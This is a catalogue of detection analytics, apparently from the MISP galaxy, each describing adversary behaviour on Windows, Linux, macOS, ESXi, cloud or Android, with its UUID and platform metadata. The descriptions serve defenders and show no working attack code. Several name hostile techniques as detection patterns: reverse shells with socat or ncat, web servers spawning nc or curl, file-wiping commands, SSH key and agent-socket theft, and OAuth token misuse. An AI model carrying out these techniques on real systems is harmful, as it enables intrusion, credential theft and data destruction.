Detects adversaries accessing remote mail systems (e.g., Exchange Online, O365) using stolen credentials or OAuth tokens, followed by scripted access to mailbox contents via PowerShell, AADInternals, or unattended API queries. Detection focuses on abnormal logon sessions, user agents, IP locations, and scripted or tool-based email data access.

Internal MISP references

UUID c42179a8-71c5-41ba-bbfa-d6c1a93e729b which can be used as unique global reference for Analytic 0131 - AN0131 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0131
mitre_platforms ['Windows']

Analytic 1013 - AN1013

Flood of spoofed SYN or ACK packets causing exhaustion of OS TCP state table, potentially via user-space utilities or kernel-level DoS agents.

Internal MISP references

UUID fde025ac-a180-472c-a9b5-b4fa1e97cc75 which can be used as unique global reference for Analytic 1013 - AN1013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1013
mitre_platforms ['Linux']

Analytic 1104 - AN1104

Adversary uses 'esxcli software vib list' to enumerate installed VIBs, drivers, and modules.

Internal MISP references

UUID 0119786d-ee1e-4857-b31a-3a43830e28e7 which can be used as unique global reference for Analytic 1104 - AN1104 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1104
mitre_platforms ['ESXi']

Analytic 0141 - AN0141

Suspicious file creation or modification in directories ignored by XProtect or AV exclusions (e.g., ~/Library, temporary cache directories). Defender perspective: monitor file events in ignored paths with correlation to execution or persistence activity.

Internal MISP references

UUID 3643a313-1aa7-44d1-b3e2-e97ad65c6837 which can be used as unique global reference for Analytic 0141 - AN0141 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0141
mitre_platforms ['macOS']

Analytic 1410 - AN1410

Adversary mounts a USB device and begins enumerating, copying, or compressing files using scripting engines, cmd, or remote access tools.

Internal MISP references

UUID 4385bff9-e730-48cd-bdfc-43de56c302aa which can be used as unique global reference for Analytic 1410 - AN1410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1410
mitre_platforms ['Windows']

Analytic 1014 - AN1014

Adversary tool/script issuing mass SYN/ACK floods that degrade OS responsiveness and interrupt service response on macOS endpoints.

Internal MISP references

UUID 4db0f97c-a0c4-4c96-af56-86c6b227ea42 which can be used as unique global reference for Analytic 1014 - AN1014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1014
mitre_platforms ['macOS']

Analytic 1401 - AN1401

Detects memory-based injection by monitoring task_for_pid, mach_vm_write, and dylib injection patterns through DYLD_INSERT_LIBRARIES or manual memory mapping.

Internal MISP references

UUID 5439d083-91d6-4369-9406-8cfb2cf5cbde which can be used as unique global reference for Analytic 1401 - AN1401 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1401
mitre_platforms ['macOS']

Analytic 0411 - AN0411

Adversary spawns command-line tools (e.g., del, cipher /w, SDelete) or scripts to recursively delete or overwrite user/system files. This may be correlated with abnormal file IO activity, registry writes, or tampering in critical system directories.

Internal MISP references

UUID 791dfdd4-b04d-498a-accc-ee9e2acc7b14 which can be used as unique global reference for Analytic 0411 - AN0411 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0411
mitre_platforms ['Windows']

Analytic 0114 - AN0114

Detects removal of persistence artifacts such as crontab entries, systemd service units, and malicious user accounts through commands like crontab -r, rm /etc/systemd/system/*.service, or userdel.

Internal MISP references

UUID 83a2f3c2-24c5-466d-8453-aa52802c2991 which can be used as unique global reference for Analytic 0114 - AN0114 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0114
mitre_platforms ['Linux']

Analytic 1041 - AN1041

Use of file enumeration commands (e.g., 'ls', 'find', 'locate') executed by suspicious users or scripts accessing broad file hierarchies or restricted directories.

Internal MISP references

UUID b50bf863-644a-48c2-85a3-2c633f135650 which can be used as unique global reference for Analytic 1041 - AN1041 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1041
mitre_platforms ['Linux']

Analytic 1140 - AN1140

Outbound spoofed traffic to known amplification protocols (e.g., DNS, NTP, Memcached) combined with abnormal network traffic volume targeting remote reflectors, resulting in disproportionate traffic returned to a victim.

Internal MISP references

UUID fdf11d76-3bd7-41c4-b117-7b0f17b31b17 which can be used as unique global reference for Analytic 1140 - AN1140 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1140
mitre_platforms ['Windows']

Analytic 1051 - AN1051

Detection of anomalous or unauthorized mailbox delegation activity (e.g., Add-MailboxPermission, Default/Anonymous mailbox permissions, Gmail delegation setup).

Internal MISP references

UUID 25bd8222-a9c0-4771-8250-7d6ce7b2d176 which can be used as unique global reference for Analytic 1051 - AN1051 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1051
mitre_platforms ['Office Suite']

Analytic 1501 - AN1501

Detects adversary abuse of Transactional NTFS (TxF) and undocumented process loading mechanisms (e.g., NtCreateProcessEx) to create a hollowed process from an uncommitted, maliciously tainted file image in memory, later executed via NtCreateThreadEx.

Internal MISP references

UUID 37d6450b-6c90-48dd-b69d-161099913851 which can be used as unique global reference for Analytic 1501 - AN1501 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1501
mitre_platforms ['Windows']

Analytic 1510 - AN1510

Use of ESXi web interface plugins or vSphere extensions to embed persistent malicious scripts or services.

Internal MISP references

UUID 55b8622a-795b-41d8-9b11-5576a0fb8f0f which can be used as unique global reference for Analytic 1510 - AN1510 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1510
mitre_platforms ['ESXi']

Analytic 0151 - AN0151

Outlook or Word used to forward suspicious internal attachments with macro content. Defender observes attachment forwarding, auto-opening behaviors, or macro prompt interactions.

Internal MISP references

UUID 5e3f407f-192b-4e6f-aab0-e0682da3a4a9 which can be used as unique global reference for Analytic 0151 - AN0151 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0151
mitre_platforms ['Office Suite']

Analytic 0115 - AN0115

Detects deletion of launch agents (~/Library/LaunchAgents/) and launch daemons (/Library/LaunchDaemons/), especially after suspicious process execution or when tied to known persistence methods.

Internal MISP references

UUID 81d64cae-ddd2-4512-9c8a-9a574b968c52 which can be used as unique global reference for Analytic 0115 - AN0115 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0115
mitre_platforms ['macOS']

Analytic 1150 - AN1150

Monitor unified logs for manipulation of proxy configurations, DNS resolution, or filtering rules. Adversaries may redirect responses or use trusted domains that later resolve to malicious C2 infrastructure.

Internal MISP references

UUID 9cf6c89d-73f7-42f8-b5e4-c87bf3abbb7d which can be used as unique global reference for Analytic 1150 - AN1150 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1150
mitre_platforms ['macOS']

Analytic 1015 - AN1015

Execution of utilities (e.g., ping, tracert, Test-NetConnection) or scripted methods to test Internet connectivity by interacting with external IPs/domains.

Internal MISP references

UUID aa2dc7aa-0cc5-4a75-96b2-8c089c46944b which can be used as unique global reference for Analytic 1015 - AN1015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1015
mitre_platforms ['Windows']

Analytic 1105 - AN1105

Multiple AWS CloudTrail events indicating temporary privilege escalation via PassRole and AssumeRole targeting newly created services or non-interactive infrastructure.

Internal MISP references

UUID adfcc782-0285-43ef-af18-127dd60d1dff which can be used as unique global reference for Analytic 1105 - AN1105 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1105
mitre_platforms ['IaaS']

Analytic 0511 - AN0511

Creation or modification of stored procedures invoking xp_cmdshell or CLR assemblies for command execution and persistence.

Internal MISP references

UUID f9fb1a46-02f0-4d89-a3d9-6bed04bd47be which can be used as unique global reference for Analytic 0511 - AN0511 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0511
mitre_platforms ['Windows']

Analytic 1061 - AN1061

Unauthorized or anomalous loading of kernel-mode drivers or DLLs, concealed services, or abnormal modification of boot components indicative of rootkit activity.

Internal MISP references

UUID 03f2259d-45c2-4422-83ad-58955f89350c which can be used as unique global reference for Analytic 1061 - AN1061 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1061
mitre_platforms ['Windows']

Analytic 1106 - AN1106

Token creation or access delegation where a user impersonates a higher-privileged service account or performs domain-wide delegation actions, such as GCP's serviceAccountTokenCreator or Workspace impersonation.

Internal MISP references

UUID 23b9a5cd-9c49-48d8-9d0d-71e35ad78337 which can be used as unique global reference for Analytic 1106 - AN1106 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1106
mitre_platforms ['Identity Provider']

Analytic 1610 - AN1610

Abuse of JamPlus.exe to launch malicious payloads via crafted .jam files, resulting in abnormal process creation, command execution, or artifact generation outside of standard development workflows.

Internal MISP references

UUID 3a5eea3b-b447-47c5-832d-6ced137b1597 which can be used as unique global reference for Analytic 1610 - AN1610 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1610
mitre_platforms ['Windows']

Analytic 1160 - AN1160

Programmatic or excessive access to file shares, SharePoint, or database repositories by users not typically interacting with them. This includes abnormal access by privileged accounts, enumeration of large numbers of files, or downloads of sensitive content in bursts.

Internal MISP references

UUID 7dce56f3-43db-4787-ae13-bd2ce6851088 which can be used as unique global reference for Analytic 1160 - AN1160 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1160
mitre_platforms ['Windows']

Analytic 0161 - AN0161

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID aae03a6c-b308-49cb-bb85-7be4a5c2a4bb which can be used as unique global reference for Analytic 0161 - AN0161 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0161
mitre_platforms ['ESXi']

Analytic 1016 - AN1016

Execution of ping, traceroute, or curl/wget against public IPs/domains to verify Internet reachability.

Internal MISP references

UUID bdba541c-3a01-4a6d-95ae-15e283f2909b which can be used as unique global reference for Analytic 1016 - AN1016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1016
mitre_platforms ['Linux']

Analytic 0116 - AN0116

Detects adversary removal of persistence implants (e.g., rc.local entries or crontab injections) via CLI (rm, sed, crontab -r) and deletion of startup or management scripts.

Internal MISP references

UUID c6ae166f-f2ac-405a-85c2-b7f9349a1b99 which can be used as unique global reference for Analytic 0116 - AN0116 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0116
mitre_platforms ['ESXi']

Analytic 1601 - AN1601

Process using URLSession or similar API to fetch from web services without any response handling, indicative of one-way C2 channels.

Internal MISP references

UUID d49f06ba-7a81-440b-bc16-c583ba918a3d which can be used as unique global reference for Analytic 1601 - AN1601 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1601
mitre_platforms ['macOS']

Analytic 0611 - AN0611

Abuse of DYLD_INSERT_LIBRARIES or hijacking framework paths for malicious libraries. Defender observes processes invoking abnormal dylibs, modified plist files, or persistence entries pointing to altered binaries.

Internal MISP references

UUID e8fc16bf-6654-4912-96c9-208e4c5bbaa6 which can be used as unique global reference for Analytic 0611 - AN0611 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0611
mitre_platforms ['macOS']

Analytic 1017 - AN1017

Execution of ping, traceroute, or network utility tools to external destinations; may include scutil or system_profiler.

Internal MISP references

UUID 1443f662-d249-4458-b8fe-2c2da7b64569 which can be used as unique global reference for Analytic 1017 - AN1017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1017
mitre_platforms ['macOS']

Analytic 1170 - AN1170

Detects usage of FTP, SCP, or TFTP by non-interactive shells or automation scripts transferring large data volumes to untrusted IPs.

Internal MISP references

UUID 170e84e2-fa22-4e8c-b2f3-3cafc0d96d7e which can be used as unique global reference for Analytic 1170 - AN1170 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1170
mitre_platforms ['Linux']

Analytic 1107 - AN1107

Detection of ApplicationImpersonation role assignment or delegated mailbox access to service principals or rarely used users, especially outside of normal hours or geographic norms.

Internal MISP references

UUID 2ec84f0f-1148-4821-acf0-a5527381865f which can be used as unique global reference for Analytic 1107 - AN1107 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1107
mitre_platforms ['Office Suite']

Analytic 0171 - AN0171

Disabling or modifying the Linux Audit system through process termination (auditd killed), service management (systemctl stop auditd), or tampering with rule/configuration files (/etc/audit/audit.rules, audit.conf). Defender view: suspicious execution of auditctl/systemctl commands, file modifications to audit rules, or sudden absence of audit logs correlated with privileged execution.

Internal MISP references

UUID 3e9734aa-b9b4-4716-927c-27c2c2aa972e which can be used as unique global reference for Analytic 0171 - AN0171 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0171
mitre_platforms ['Linux']

Analytic 1071 - AN1071

Adversaries using bash scripts or tools to recursively enumerate user home directories, config files, or SSH keys.

Internal MISP references

UUID 4f5f64b3-bc1b-4573-b790-42b8adfdd609 which can be used as unique global reference for Analytic 1071 - AN1071 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1071
mitre_platforms ['Linux']

Analytic 0711 - AN0711

Unusual access to SSH agent sockets in /tmp/ or /private/tmp, process access to another user’s $SSH_AUTH_SOCK, and lateral SSH activity without corresponding login events. Defender view: correlation of socket access with anomalous network flows to internal systems.

Internal MISP references

UUID de71bbc0-66b2-41ae-a3f3-4911ac31b391 which can be used as unique global reference for Analytic 0711 - AN0711 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0711
mitre_platforms ['macOS']

Analytic 0117 - AN0117

Adversary with write access to storage modifies lifecycle policies (e.g., via PutBucketLifecycle) to schedule rapid object deletion across one or more storage buckets. This is often used to trigger impact (destruction), remove logs (defense evasion), or force extortion (ransomware).

Internal MISP references

UUID f6f90ad5-3182-4b1a-a612-51b251a8a34c which can be used as unique global reference for Analytic 0117 - AN0117 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0117
mitre_platforms ['IaaS']

Analytic 1701 - AN1701

The user is prompted for approval when an application requests device administrator permissions. Application vetting services can check for the string BIND_DEVICE_ADMIN in the application’s manifest. This indicates it can prompt the user for device administrator permissions. The user can see which applications are registered as device administrators in the device settings.

Internal MISP references

UUID 6852479f-7c3d-4c69-82b9-b5b9976e4101 which can be used as unique global reference for Analytic 1701 - AN1701 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1701
mitre_platforms ['Android']

Analytic 1710 - AN1710

System Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 98dfbd23-232b-410a-bb71-25ba191ff746 which can be used as unique global reference for Analytic 1710 - AN1710 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1710
mitre_platforms ['Android']

Analytic 1180 - AN1180

Monitor unified DNS logs for abnormal domain queries with low lexical similarity to known domains, repeated failed lookups, and random string structures. Cross-check with process logs to confirm unusual origins (non-browser apps).

Internal MISP references

UUID 63de336c-105c-4e8f-aefc-420a3eac32e9 which can be used as unique global reference for Analytic 1180 - AN1180 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1180
mitre_platforms ['macOS']

Analytic 1108 - AN1108

Unexpected file creation in web directories followed by web server processes (e.g., w3wp.exe) spawning command shells or script interpreters (e.g., cmd.exe, powershell.exe).

Internal MISP references

UUID 66c98f78-2848-43f4-a69d-5562f03712ec which can be used as unique global reference for Analytic 1108 - AN1108 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1108
mitre_platforms ['Windows']

Analytic 0181 - AN0181

Execution of processes using nohup or shell redirection to ignore SIGHUP and continue running after session termination. Defender perspective: correlation between commands including nohup, disowned jobs, or & suffix with continued process execution after parent terminal exit.

Internal MISP references

UUID 8d75d4b3-6748-4d1c-936c-129ee56a12a5 which can be used as unique global reference for Analytic 0181 - AN0181 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0181
mitre_platforms ['Linux']

Analytic 1081 - AN1081

Detects bash, sh, zsh, or BusyBox shell execution initiated via remote sessions, unauthorized users, or embedded within secondary script interpreters. Focus is on chained behavior: shell > suspicious commands > network discovery or persistence indicators.

Internal MISP references

UUID c5556dd5-005a-4c11-b028-240fa379d827 which can be used as unique global reference for Analytic 1081 - AN1081 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1081
mitre_platforms ['Linux']

Analytic 0811 - AN0811

Detects SaaS web login followed by dashboard or web GUI page views from unfamiliar locations, devices, or access patterns. Identifies use of sensitive reporting or configuration consoles accessed from high-risk accounts.

Internal MISP references

UUID d3e3ed48-7402-40df-a6cc-db9b560bcfd1 which can be used as unique global reference for Analytic 0811 - AN0811 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0811
mitre_platforms ['SaaS']

Analytic 0118 - AN0118

Detects abuse of verclsid.exe to execute COM objects by monitoring process creation, CLSID arguments, DLLs or scriptlet engines loaded into memory, and, if the CLSID points to remote SCT/HTA content, outbound connections made by verclsid.exe.

Internal MISP references

UUID e9f451b7-1b9e-420e-983a-3442547b7180 which can be used as unique global reference for Analytic 0118 - AN0118 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0118
mitre_platforms ['Windows']

Analytic 1018 - AN1018

Execution of ping, vmkping, or curl from shell or through automation jobs/scripts to verify Internet egress.

Internal MISP references

UUID ef76221d-d5fe-4285-af27-54711e94e2b5 which can be used as unique global reference for Analytic 1018 - AN1018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1018
mitre_platforms ['ESXi']

Analytic 1801 - AN1801

Application vetting services could look for use of the accessibility service or features that typically require root access. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 176d2eda-e41b-48d0-b66a-daaccb5a77cd which can be used as unique global reference for Analytic 1801 - AN1801 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1801
mitre_platforms ['Android']

Analytic 1810 - AN1810

Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f420e242-1e51-4d1a-b063-b15240283e1f which can be used as unique global reference for Analytic 1810 - AN1810 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1810
mitre_platforms ['Android']

Analytic 0191 - AN0191

Phishing via Office documents containing embedded macros or links that spawn processes. Detection relies on correlating Office application logs with suspicious child process execution and outbound network connections.

Internal MISP references

UUID 46ecb875-0842-4171-bb36-9b361453a89f which can be used as unique global reference for Analytic 0191 - AN0191 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0191
mitre_platforms ['Office Suite']

Analytic 0911 - AN0911

Execution of virtualization binaries (Parallels, VMware Fusion, VirtualBox) with arguments to hide UI. File monitoring for plist modifications indicating hidden virtualization behavior. Defender perspective: tracking process lineage and file modifications in system configs.

Internal MISP references

UUID 4d76bcf2-0935-4f61-8dd9-57ee3713b840 which can be used as unique global reference for Analytic 0911 - AN0911 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0911
mitre_platforms ['macOS']

Analytic 1019 - AN1019

Detection of excessive or programmatic access to Confluence spaces or pages, particularly by privileged users, through a combination of access logs, API usage, and identity context. Correlates logon sessions, user roles, and abnormal document viewing or export behavior. Identifies burst access patterns and tools/scripts abusing the Confluence API for mass enumeration or data scraping.

Internal MISP references

UUID 62f43db8-4701-49b9-bb0e-a8fde37e5d07 which can be used as unique global reference for Analytic 1019 - AN1019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1019
mitre_platforms ['SaaS']

Analytic 1190 - AN1190

Detects command-line tools, agents, or scripts making outbound HTTPS connections to popular web services like Discord, Slack, Dropbox, or Graph API in an unusual context.

Internal MISP references

UUID 6e053521-1d6d-493f-8cd5-34f9a5992fc7 which can be used as unique global reference for Analytic 1190 - AN1190 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1190
mitre_platforms ['Linux']

Analytic 1109 - AN1109

File creation of unauthorized script (e.g., .php, .sh) in /var/www/html followed by execution of unexpected system utilities (e.g., curl, bash, nc) by apache/nginx.

Internal MISP references

UUID 9e80763b-5287-451f-b2ab-37168b159387 which can be used as unique global reference for Analytic 1109 - AN1109 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1109
mitre_platforms ['Linux']

Analytic 0119 - AN0119

Unusual process or API usage attempting to query system locale, timezone, or keyboard layout (e.g., calls to GetLocaleInfoW, GetTimeZoneInformation). Detection can be enhanced by correlating with processes not typically associated with system configuration queries, such as unknown binaries or scripts.

Internal MISP references

UUID cd4d2b49-6a27-41a7-ab20-d2a3791142bd which can be used as unique global reference for Analytic 0119 - AN0119 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0119
mitre_platforms ['Windows']

Analytic 1091 - AN1091

Detects anomalous ARP traffic or cache modifications on Windows endpoints that indicate ARP poisoning. Behavioral focus is on multiple IP addresses resolving to a single MAC, or unsolicited ARP replies from unauthorized devices.

Internal MISP references

UUID dc4a80e3-7670-474f-aaf6-c051d5dda83c which can be used as unique global reference for Analytic 1091 - AN1091 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1091
mitre_platforms ['Windows']

Analytic 2012 - AN2012

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 40c8a3ac-4fe9-49c3-a9bd-f8f684d42003 which can be used as unique global reference for Analytic 2012 - AN2012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2012
mitre_platforms ['PRE']

Analytic 0122 - AN0122

Detection of queries to instance metadata services (e.g., AWS IMDS, Azure Metadata Service) for availability zone, region, or network geolocation details. Correlation with non-management accounts or non-standard workloads may indicate adversary reconnaissance.

Internal MISP references

UUID 5b41efa6-7410-403b-ac07-89e262fa17ca which can be used as unique global reference for Analytic 0122 - AN0122 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0122
mitre_platforms ['IaaS']

Analytic 1220 - AN1220

Execution of SyncAppvPublishingServer.vbs through wscript.exe with a command-line containing embedded PowerShell, proxying malicious PowerShell execution through a Microsoft-signed VBScript interpreter to evade detection and restrictions.

Internal MISP references

UUID a59042de-ecac-45bf-a852-af3df41b86d8 which can be used as unique global reference for Analytic 1220 - AN1220 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1220
mitre_platforms ['Windows']

Analytic 1022 - AN1022

LaunchAgents or LaunchDaemons initiate persistent Tor or relay processes that make encrypted outbound connections. May be paired with sandbox bypasses or unsigned executables communicating over SOCKS proxies.

Internal MISP references

UUID b97a1c6e-bb02-4e14-ae57-6a9e96512657 which can be used as unique global reference for Analytic 1022 - AN1022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1022
mitre_platforms ['macOS']

Analytic 1202 - AN1202

Monitor email message traces and headers for failed SPF, DKIM, or DMARC checks indicating spoofed sender identities. Correlate abnormal sender domains or mismatched return-paths with elevated spoofing likelihood.

Internal MISP references

UUID c0055eb3-5579-48a8-b9d3-df6dd67bc388 which can be used as unique global reference for Analytic 1202 - AN1202 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1202
mitre_platforms ['Windows']

Analytic 0212 - AN0212

Execution of file transfer or network access activity through non-primary interfaces (e.g., WiFi, Bluetooth, cellular) by processes not typically associated with such behavior (e.g., rundll32, powershell, regsvr32).

Internal MISP references

UUID cf404364-1397-4f0f-9c21-cd534880722a which can be used as unique global reference for Analytic 0212 - AN0212 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0212
mitre_platforms ['Windows']

Analytic 0221 - AN0221

Adversary targets macOS-hosted public services (e.g., nginx, node). Chain: suspicious inbound request → service crash/5xx → service spawns shell or writes file → new outbound connection.

Internal MISP references

UUID ddab6d30-7e37-462e-b183-39c7ceb2b986 which can be used as unique global reference for Analytic 0221 - AN0221 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0221
mitre_platforms ['macOS']

Analytic 2021 - AN2021

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e1f67192-803a-4cd3-a455-64bb623263d6 which can be used as unique global reference for Analytic 2021 - AN2021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2021
mitre_platforms ['PRE']

Analytic 1023 - AN1023

Outbound encrypted traffic initiated from hypervisor shell or via VM backdoor mechanisms to relays in VPS infrastructure, especially if traversing multiple nodes before reaching Internet destination. Packet captures or firewall logs show non-VM communication paths.

Internal MISP references

UUID 08370ff8-9442-42c0-bfb5-c7f5792c74ea which can be used as unique global reference for Analytic 1023 - AN1023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1023
mitre_platforms ['ESXi']

Analytic 0312 - AN0312

Detection of changes or execution of shell initialization scripts like .bashrc, .profile, or /etc/profile for persistence.

Internal MISP references

UUID 0f8a0af6-7544-4f29-8e08-6b07dda1337e which can be used as unique global reference for Analytic 0312 - AN0312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0312
mitre_platforms ['Linux']

Analytic 1203 - AN1203

Detects spoofed emails by analyzing mail server logs (e.g., Postfix, Sendmail) for mismatched header fields, failed SPF/DKIM checks, and anomalies in SMTP proxy logs. Defender observes discrepancies between sending domain, return-path domain, and message metadata.

Internal MISP references

UUID 38300670-8c96-4f80-bc1b-d69242023a20 which can be used as unique global reference for Analytic 1203 - AN1203 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1203
mitre_platforms ['Linux']

Analytic 0132 - AN0132

Monitors programmatic access to user mailboxes in cloud-based email systems (e.g., O365, Exchange Online) using APIs or tokens. Focuses on OAuth misuse, suspicious MailItemsAccessed patterns, scripted keyword searches, and connections from untrusted agents or locations.

Internal MISP references

UUID 3af413c2-5b26-4f43-b198-11b4dce97a0a which can be used as unique global reference for Analytic 0132 - AN0132 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0132
mitre_platforms ['Office Suite']

Analytic 1320 - AN1320

Detects unauthorized modifications to login-facing web server files (e.g., index.php, login.js) typically tied to VPN, SSO, or intranet portals. Correlates suspicious file changes with remote access artifacts or web shell behavior.

Internal MISP references

UUID 5233d621-6658-4338-b183-01bd73e52861 which can be used as unique global reference for Analytic 1320 - AN1320 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1320
mitre_platforms ['Linux']

Analytic 0213 - AN0213

Use of rfkill, nmcli, or low-level tools (e.g., iw, hcitool, pppd) to enable alternate interfaces followed by data transfer via non-primary NICs.

Internal MISP references

UUID 5b9f2d26-e84c-49a3-8586-a7367580b802 which can be used as unique global reference for Analytic 0213 - AN0213 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0213
mitre_platforms ['Linux']

Analytic 0231 - AN0231

Modification of user desktop backgrounds, login screen messages, or system banners by adversaries using admin privileges or script execution. May coincide with tampering in /Library/Desktop Pictures/ or use of AppleScript.

Internal MISP references

UUID 83d3222d-6a35-401d-95b5-a09f0eac2201 which can be used as unique global reference for Analytic 0231 - AN0231 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0231
mitre_platforms ['macOS']

Analytic 2013 - AN2013

If infrastructure or patterns in the malicious web content related to SEO poisoning or Drive-by Target have been previously identified, internet scanning may uncover when an adversary has staged web content supporting a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID 86a212ef-8e7b-4c51-9e7f-492da2283294 which can be used as unique global reference for Analytic 2013 - AN2013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2013
mitre_platforms ['PRE']

Analytic 2031 - AN2031

Detection of HTTP outbound requests with inconsistent or spoofed User-Agent headers from command-line tools (e.g., curl, wget, python requests) following interactive user shells or scheduled jobs outside of normal user session behavior.

Internal MISP references

UUID acabb18b-e2d6-4531-92bb-4165f0a16595 which can be used as unique global reference for Analytic 2031 - AN2031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2031
mitre_platforms ['Linux']

Analytic 1230 - AN1230

User-space tools (e.g., socat, ncat, iptables, ssh) used in non-standard ways to establish reverse shells, port-forwarding, or inter-host connections. Often chained with uncommon outbound destinations or SSH tunnels.

Internal MISP references

UUID b95a3fbf-3d6c-4ead-8421-ff9c07ca4019 which can be used as unique global reference for Analytic 1230 - AN1230 in MISP communities and other software using the MISP galaxy

External references
